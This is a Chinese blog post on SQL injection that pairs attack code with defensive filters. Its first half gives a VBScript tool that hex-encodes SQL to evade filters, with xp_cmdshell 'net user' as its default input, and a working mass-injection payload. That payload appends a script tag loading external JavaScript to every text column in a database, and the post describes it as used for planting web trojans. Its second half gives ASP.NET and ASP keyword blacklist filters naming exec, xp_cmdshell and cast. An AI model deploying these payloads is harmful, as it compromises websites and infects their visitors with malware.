SQL注入之SQL语句转十六进制

HTML代码

<script language=vbs>
sub sqlencode()
Dim strTest
strTest = form1.text1.value
myHex = Str2Hex(strTest)
document.write "<pre>DECLARE @S NVARCHAR(4000) SET @S=CAST(0x"&myhex&" AS NVARCHAR(4000)) EXEC(@S)</pre>"
end sub
Function Str2Hex(ByVal strHex)
 Dim sHex
 For i = 1 To Len(strHex)
  sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
 Next
 Str2Hex = sHex
End Function
</script>
<form name=form1 method="post">
<p>请输入sql语句,例子:</p><br>
<input type=text name=text1 value='exec master.dbo.xp_cmdshell "net user"--' size=100><input type=submit onclick=sqlencode()
value="给我转">
</form>

 

exp

原程序代码

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name FROM sysobjects a,syscolumns b Where a.id=b.id AND a.xtype='u' AND (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('Update ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://****/*.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

 

转换后的代码

DECLARE @S NVARCHAR(4000) SET @S=CAST(0x4400450043004C0041005200450020004000540020005600410052004300480041005200280032003500350029002C004000430020005600410052004300480041005200280032003500350029004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000530065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000460052004F004D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200057006800650072006500200061002E00690064003D0062002E0069006400200041004E004400200061002E00780074007900700065003D00270075002700200041004E0044002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D003000290042004500470049004E00200045005800450043002800270055007000640061007400650020005B0027002B00400054002B0027005D00200053004500540020005B0027002B00400043002B0027005D003D0052005400520049004D00280043004F004E005600450052005400280056004100520043004800410052002800340030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F002A002A002A002A002F002A002E006A0073003E003C002F007300630072006900700074003E00270027002700290020004600450054004300480020004E004500580054002000460052004F004D0020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000)) EXEC(@S)

功能是遍历该数据库的所有数据表中所有varchar ,text,nvarchar,ntext类型的字段,并在字段尾加上
<script src=http://****/*.js></script>,常用于js或iframe挂马。

 

ASP.NET防SQL注入程序代码

 

using System;
using System.Configuration;
using System.Web;
using System.Globalization;

namespace Koray.SqlInject
{
   /* public class SqlInject
    {

    }
    */
    public class SqlstrAny : IHttpModule
    {
        public void Init(HttpApplication application)
        {
            application.BeginRequest += (new
            EventHandler(this.Application_BeginRequest));
        }
        private void Application_BeginRequest(Object source, EventArgs e)
        {
            ProcessRequest pr = new ProcessRequest();
            pr.StartProcessRequest();
        }
        public void Dispose()
        {
        }
    }

    public class ProcessRequest
    {
        private static string SqlStr = System.Configuration.ConfigurationManager.AppSettings["SqlInject"].ToString();
        private static string sqlErrorPage = System.Configuration.ConfigurationSettings.AppSettings["SQLInjectErrPage"].ToString();
        ///
        /// 用来识别是否是流的方式传输
        ///
        ///
        ///
        bool IsUploadRequest(HttpRequest request)
        {
            return StringStartsWithAnotherIgnoreCase(request.ContentType, "multipart/form-data");
        }
        ///
        /// 比较内容类型
        ///
        ///
        ///
        ///
        private static bool StringStartsWithAnotherIgnoreCase(string s1, string s2)
        {
            return (string.Compare(s1, 0, s2, 0, s2.Length, true, CultureInfo.InvariantCulture) == 0);
        }

        //SQL注入式攻击代码分析
        #region SQL注入式攻击代码分析
        ///
        /// 处理用户提交的请求
        ///
        public void StartProcessRequest()
        {
            HttpRequest Request = System.Web.HttpContext.Current.Request;
            HttpResponse Response = System.Web.HttpContext.Current.Response;
            try
            {
                string getkeys = "";
                if (IsUploadRequest(Request)) return; //如果是流传递就退出
                //字符串参数
                if (Request.QueryString != null)
                {
                    for (int i = 0; i < Request.QueryString.Count; i++)
                    {
                        getkeys = Request.QueryString.Keys[i];
                        if (!ProcessSqlStr(Request.QueryString[getkeys]))
                        {
                            logSqlstr(DateTime.Now.ToShortDateString() +" "+DateTime.Now.ToShortTimeString()+ ":" + Request.ServerVariables["Url"]);
                            logSqlstr(getkeys + "=" + Request.QueryString[getkeys]);
                            Response.Redirect(sqlErrorPage + "?errmsg=QueryStringError&sqlprocess=true");
                            Response.End();
                        }
                    }
                }
                //form参数
                if (Request.Form != null)
                {
                    for (int i = 0; i < Request.Form.Count; i++)
                    {
                        getkeys = Request.Form.Keys[i];
                        if (!ProcessSqlStr(Request.Form[getkeys]))
                        {
                            logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
                            logSqlstr(getkeys + "=" + Request.Form[getkeys]);
                            Response.Redirect(sqlErrorPage + "?errmsg=FormError&sqlprocess=true");
                            Response.End();
                        }
                    }
                }
                //cookie参数
                if (Request.Cookies != null)
                {
                    for (int i = 0; i < Request.Cookies.Count; i++)
                    {
                        getkeys = Request.Cookies.Keys[i];
                        if (!ProcessSqlStr(Request.Cookies[getkeys].Value))
                        {
                            logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
                            logSqlstr(getkeys + "=" + Request.Cookies[getkeys]);
                            Response.Redirect(sqlErrorPage + "?errmsg=CookieError&sqlprocess=true");
                            Response.End();
                        }
                    }
                }
            }
            catch(Exception ex)
            {
                // 错误处理: 处理用户提交信息!
                Response.Clear();
                Response.Write("CustomErrorPage Error"+ex.Message);
                Response.End();
            }
        }

        ///
        /// 分析用户请求是否正常
        ///
        /// 传入用户提交数据
        /// 返回是否含有SQL注入式攻击代码
        private bool ProcessSqlStr(string Str)
        {
            bool ReturnValue = true;
            try
            {
                if (Str != "")
                {
                    Str = Str.ToLower();
                    string[] anySqlStr = SqlStr.Split('|');
                    foreach (string ss in anySqlStr)
                    {
                        if (Str.IndexOf(ss) >= 0)
                        {
                            ReturnValue = false;
                            break;
                        }
                    }
                }
            }
            catch
            {
                ReturnValue = false;
            }
            return ReturnValue;
        }

        private void logSqlstr(string str)
        {
            HttpRequest req = System.Web.HttpContext.Current.Request;
            string fileName = "/Log/log_"+DateTime.Now.ToShortDateString().Replace("/","_")+".log";
            fileName=req.MapPath(fileName);
            if (!System.IO.File.Exists(fileName))
            {
                System.IO.FileStream f = System.IO.File.Create(fileName);
                f.Close();
            }
            System.IO.StreamWriter f2 = new System.IO.StreamWriter(fileName, true, System.Text.Encoding.GetEncoding("utf-8"));
            f2.WriteLine(str);
            f2.Close();
            f2.Dispose();

        }
        #endregion
    }
}

在web.config中加入

 

<appSettings>
    <add value="exec|insert|delete|update|chr|mid|master|truncate|declare|cast(|drop table" key="SQLInject" />
    <add value="/error.aspx" key="SQLInjectErrPage" />
  </appSettings>

<httpModules>
        <add name="SqlstrAny"  type="Koray.SqlInject.SqlstrAny,Koray.SqlInject"/>
  </httpModules>

 ASP.NET组件参考了:
http://hi.baidu.com/honfei/blog/item/7d6bd23610cd0edaa3cc2ba8.html

 

ASP防SQL注入代码

 

Sub SQLInject
    Dim strTemp,errLogFile,rtnerr,RtnArr,ErrLogFileName
    ErrLogFileName="/Log/err_"&DateToStr(Now(),"Y-m-d")&".log"
    strTemp=""
    strTemp = strTemp & Request.ServerVariables("URL")
    If Trim(Request.QueryString) <> "" Then strTemp = strTemp & "?" & Trim(Request.QueryString)
    strTemp = Lcase(strTemp)
    If Instr(strTemp,"declare") or Instr(strTemp,"select") or Instr(strTemp,"insert into") or Instr(strTemp,"delete from") or Instr(strTemp,"count(") or Instr(strTemp,"drop table") or Instr(strTemp,"truncate") or Instr(strTemp,"mid(") or Instr(strTemp,"char(") or Instr(strTemp,"xp_cmdshell") or Instr(strTemp,"exec master") or Instr(strTemp,"net localgroup administrators") or Instr(strTemp,":") or Instr(strTemp,"net user") or Instr(strTemp,"'") then
    RtnArr=LoadFromFile(ErrLogFileName)
    if RtnArr(0)=0 then
        errLogFile=RtnArr(1)
    else
        errLogFile="start"
    end if
    errLogFile=errLogFile&vbcrlf&vbcrlf
    errLogFile=errLogFile&"IP:"&getIP()&" Time:"&Cstr(Now())&" Info:"&strTemp
    rtnerr=SaveToFileByGb2312(errLogFile,ErrLogFileName)
    Response.Write "<html><title>Waring</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>You has been submit a bad querystring!</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>Your Ip Has been record!</li><br><li>IP:"&getIP()&"</li><br><li>Time:"&Now&"</li></font></body></html><!--AddTime:"&now&"-->"
    response.end
    End If
End Sub

'读日志文件
Function LoadFromFile(ByVal File)
    Dim objStream
    Dim RText
    RText=array(0,"")
    Set objStream = Server.CreateObject("ADODB.Stream")
    With objStream
        .Type = 2
        .Mode = 3
        .Open
        .Charset = "utf-8"
        .Position = objStream.Size
        on error resume next
        .LoadFromFile Server.MapPath(File)
        If Err Then
           RText=array(Err.Number,Err.Description)
           LoadFromFile=RText
           Err.Clear
           exit function
        End If
        RText=array(0,.ReadText)
        .Close
    End With
    LoadFromFile=RText
    Set objStream = Nothing
End Function

'写日志
Function SaveToFileByGb2312(ByVal strBody,ByVal File)
    Dim objStream
    Dim RText
    RText=array(0,"")
    Set objStream = Server.CreateObject("ADODB.Stream")
    With objStream
        .Type = 2
        .Open
        .Charset = "gb2312"
        .Position = objStream.Size
        .WriteText = strBody
        .SaveToFile Server.MapPath(File),2
        .Close
    End With
    RText=array(0,"保存文件成功!")
    SaveToFileByGb2312=RText
    Set objStream = Nothing
End Function

 

原文地址:http://www.nbman.cn/article.asp?id=112

posted @ 2010-12-20 15:08  操作者  阅读(7752)  评论(0编辑  收藏  举报